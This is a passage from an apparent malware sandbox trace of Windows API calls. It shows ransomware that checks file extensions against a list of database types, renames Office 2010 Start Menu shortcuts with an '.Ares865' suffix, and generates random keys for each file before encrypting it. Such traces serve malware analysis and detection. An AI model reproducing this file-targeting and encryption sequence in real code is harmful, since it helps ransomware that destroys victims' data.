[0066.939] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0066.939] lstrlenW (lpString="idb") returned 3 [0066.939] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0066.939] lstrlenW (lpString="ihx") returned 3 [0066.939] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0066.939] lstrlenW (lpString="itdb") returned 4 [0066.939] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0066.939] lstrlenW (lpString="itw") returned 3 [0066.939] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0066.939] lstrlenW (lpString="jet") returned 3 [0066.939] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0066.939] lstrlenW (lpString="jtx") returned 3 [0066.939] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0066.939] lstrlenW (lpString="kdb") returned 3 [0066.939] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0066.939] lstrlenW (lpString="kexi") returned 4 [0066.939] lstrcmpiW (lpString1=".lnk", lpString2="kexi") returned -1 [0066.939] lstrlenW (lpString="kexic") returned 5 [0066.939] lstrcmpiW (lpString1="0.lnk", lpString2="kexic") returned -1 [0066.939] lstrlenW (lpString="kexis") returned 5 [0066.939] lstrcmpiW (lpString1="0.lnk", lpString2="kexis") returned -1 [0066.939] lstrlenW (lpString="lgc") returned 3 [0066.939] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0066.939] lstrlenW (lpString="lwx") returned 3 [0066.939] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0066.939] lstrlenW (lpString="maf") returned 3 [0066.939] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0066.939] lstrlenW (lpString="maq") returned 3 [0066.939] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0066.939] lstrlenW (lpString="mar") returned 3 [0066.939] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0066.939] lstrlenW (lpString="marshal") returned 7 [0066.939] lstrcmpiW (lpString1="010.lnk", lpString2="marshal") returned -1 [0066.939] lstrlenW (lpString="mas") returned 3 [0066.940] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0066.940] lstrlenW (lpString="mav") returned 3 [0066.940] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0066.940] lstrlenW (lpString="maw") returned 3 [0066.940] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0066.940] lstrlenW (lpString="mdbhtml") returned 7 [0066.940] lstrcmpiW (lpString1="010.lnk", lpString2="mdbhtml") returned -1 [0066.940] lstrlenW (lpString="mdn") returned 3 [0066.940] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0066.940] lstrlenW (lpString="mdt") returned 3 [0066.940] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0066.940] lstrlenW (lpString="mfd") returned 3 [0066.940] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0066.940] lstrlenW (lpString="mpd") returned 3 [0066.940] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0066.940] lstrlenW (lpString="mrg") returned 3 [0066.940] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0066.940] lstrlenW (lpString="mud") returned 3 [0066.940] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0066.940] lstrlenW (lpString="mwb") returned 3 [0066.940] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0066.940] lstrlenW (lpString="myd") returned 3 [0066.940] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 [0066.940] lstrlenW (lpString="ndf") returned 3 [0066.940] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0066.940] lstrlenW (lpString="nnt") returned 3 [0066.940] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0066.940] lstrlenW (lpString="nrmlib") returned 6 [0066.940] lstrcmpiW (lpString1="10.lnk", lpString2="nrmlib") returned -1 [0066.940] lstrlenW (lpString="ns2") returned 3 [0066.940] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0066.940] lstrlenW (lpString="ns3") returned 3 [0066.940] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0066.940] lstrlenW (lpString="ns4") returned 3 [0066.940] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0066.940] lstrlenW (lpString="nsf") returned 3 [0066.940] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0066.940] lstrlenW (lpString="nv") returned 2 [0066.941] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0066.941] lstrlenW (lpString="nv2") returned 3 [0066.941] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0066.941] lstrlenW (lpString="nwdb") returned 4 [0066.941] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0066.941] lstrlenW (lpString="nyf") returned 3 [0066.941] lstrcmpiW (lpString1="lnk", lpString2="nyf") returned -1 [0066.941] lstrlenW (lpString="odb") returned 3 [0066.941] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0066.941] lstrlenW (lpString="odb") returned 3 [0066.941] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0066.941] lstrlenW (lpString="oqy") returned 3 [0066.941] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0066.941] lstrlenW (lpString="ora") returned 3 [0066.941] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0066.941] lstrlenW (lpString="orx") returned 3 [0066.941] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0066.941] lstrlenW (lpString="owc") returned 3 [0066.941] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0066.941] lstrlenW (lpString="p96") returned 3 [0066.941] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0066.941] lstrlenW (lpString="p97") returned 3 [0066.941] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0066.941] lstrlenW (lpString="pan") returned 3 [0066.941] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0066.941] lstrlenW (lpString="pdb") returned 3 [0066.941] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0066.941] lstrlenW (lpString="pdm") returned 3 [0066.941] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0066.941] lstrlenW (lpString="pnz") returned 3 [0066.941] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0066.941] lstrlenW (lpString="qry") returned 3 [0066.941] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0066.941] lstrlenW (lpString="qvd") returned 3 [0066.941] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0066.941] lstrlenW (lpString="rbf") returned 3 [0066.941] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0066.941] lstrlenW (lpString="rctd") returned 4 [0066.941] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0066.942] lstrlenW (lpString="rod") returned 3 [0066.942] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0066.942] lstrlenW (lpString="rodx") returned 4 [0066.942] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0066.942] lstrlenW (lpString="rpd") returned 3 [0066.942] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0066.942] lstrlenW (lpString="rsd") returned 3 [0066.942] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0066.942] lstrlenW (lpString="sas7bdat") returned 8 [0066.942] lstrcmpiW (lpString1="2010.lnk", lpString2="sas7bdat") returned -1 [0066.942] lstrlenW (lpString="sbf") returned 3 [0066.942] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0066.942] lstrlenW (lpString="scx") returned 3 [0066.942] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0066.942] lstrlenW (lpString="sdb") returned 3 [0066.942] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0066.942] lstrlenW (lpString="sdc") returned 3 [0066.942] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0066.942] lstrlenW (lpString="sdf") returned 3 [0066.942] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0066.942] lstrlenW (lpString="sis") returned 3 [0066.942] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0066.942] lstrlenW (lpString="spq") returned 3 [0066.942] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0066.942] lstrlenW (lpString="te") returned 2 [0066.942] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0066.942] lstrlenW (lpString="teacher") returned 7 [0066.942] lstrcmpiW (lpString1="010.lnk", lpString2="teacher") returned -1 [0066.942] lstrlenW (lpString="tmd") returned 3 [0066.942] lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0066.942] lstrlenW (lpString="tps") returned 3 [0066.942] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0066.942] lstrlenW (lpString="trc") returned 3 [0066.942] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0066.942] lstrlenW (lpString="trc") returned 3 [0066.942] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0066.942] lstrlenW (lpString="trm") returned 3 [0066.943] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0066.943] lstrlenW (lpString="udb") returned 3 [0066.943] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0066.943] lstrlenW (lpString="udl") returned 3 [0066.943] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0066.943] lstrlenW (lpString="usr") returned 3 [0066.943] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0066.943] lstrlenW (lpString="v12") returned 3 [0066.943] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0066.943] lstrlenW (lpString="vis") returned 3 [0066.943] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0066.943] lstrlenW (lpString="vpd") returned 3 [0066.943] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0066.943] lstrlenW (lpString="vvv") returned 3 [0066.943] lstrcmpiW (lpString1="lnk", lpString2="vvv") returned -1 [0066.943] lstrlenW (lpString="wdb") returned 3 [0066.943] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0066.943] lstrlenW (lpString="wmdb") returned 4 [0066.943] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0066.943] lstrlenW (lpString="wrk") returned 3 [0066.943] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0066.943] lstrlenW (lpString="xdb") returned 3 [0066.943] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0066.943] lstrlenW (lpString="xld") returned 3 [0066.943] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0066.943] lstrlenW (lpString="xmlff") returned 5 [0066.943] lstrcmpiW (lpString1="0.lnk", lpString2="xmlff") returned -1 [0066.943] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft OneNote 2010.lnk.Ares865") returned 90 [0066.943] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft OneNote 2010.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft onenote 2010.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft OneNote 2010.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft onenote 2010.lnk.ares865"), dwFlags=0x1) returned 1 [0066.944] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft OneNote 2010.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft onenote 2010.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.945] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2879) returned 1 [0066.945] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0066.945] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0066.945] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0066.945] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0066.946] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.946] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.949] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0066.949] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.950] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.950] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Outlook 2010.lnk.Ares865") returned 90 [0066.950] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Outlook 2010.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft outlook 2010.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Outlook 2010.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft outlook 2010.lnk.ares865"), dwFlags=0x1) returned 1 [0066.951] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Outlook 2010.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft outlook 2010.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.952] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3029) returned 1 [0066.952] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0066.952] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0066.952] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0066.952] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0066.953] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.953] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.955] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0066.955] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.955] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.956] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft PowerPoint 2010.lnk.Ares865") returned 93 [0066.956] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft PowerPoint 2010.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft powerpoint 2010.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft PowerPoint 2010.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft powerpoint 2010.lnk.ares865"), dwFlags=0x1) returned 1 [0066.957] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft PowerPoint 2010.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft powerpoint 2010.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.958] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2937) returned 1 [0066.958] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0066.959] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0066.959] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0066.959] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0066.960] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.960] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.962] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0066.963] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.963] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.963] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Project 2010.lnk.Ares865") returned 90 [0066.963] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Project 2010.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft project 2010.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Project 2010.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft project 2010.lnk.ares865"), dwFlags=0x1) returned 1 [0066.964] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Project 2010.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft project 2010.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.964] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2935) returned 1 [0066.965] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0066.965] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0066.965] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0066.965] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0066.966] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.966] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.969] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0066.969] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.970] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.970] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Publisher 2010.lnk.Ares865") returned 92 [0066.970] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Publisher 2010.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft publisher 2010.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Publisher 2010.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft publisher 2010.lnk.ares865"), dwFlags=0x1) returned 1 [0066.971] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Publisher 2010.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft publisher 2010.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.971] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3041) returned 1 [0066.971] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0066.972] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0066.972] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0066.972] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0066.972] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.972] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.974] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0066.975] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.975] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.975] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft SharePoint Workspace 2010.lnk.Ares865") returned 103 [0066.975] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft SharePoint Workspace 2010.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft sharepoint workspace 2010.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft SharePoint Workspace 2010.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft sharepoint workspace 2010.lnk.ares865"), dwFlags=0x1) returned 1 [0066.977] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft SharePoint Workspace 2010.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft sharepoint workspace 2010.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.977] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3055) returned 1 [0066.977] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0066.977] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0066.977] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0066.977] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0066.978] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.978] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.980] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0066.981] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.981] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.981] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Visio 2010.lnk.Ares865") returned 88 [0066.981] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Visio 2010.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft visio 2010.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Visio 2010.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft visio 2010.lnk.ares865"), dwFlags=0x1) returned 1 [0066.982] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Visio 2010.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft visio 2010.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.982] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2767) returned 1 [0066.982] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0066.983] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0066.983] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0066.983] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0066.983] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.983] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.984] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0066.985] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.985] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.986] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Word 2010.lnk.Ares865") returned 87 [0066.986] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Word 2010.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft word 2010.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Word 2010.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft word 2010.lnk.ares865"), dwFlags=0x1) returned 1 [0066.987] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Word 2010.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft word 2010.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) 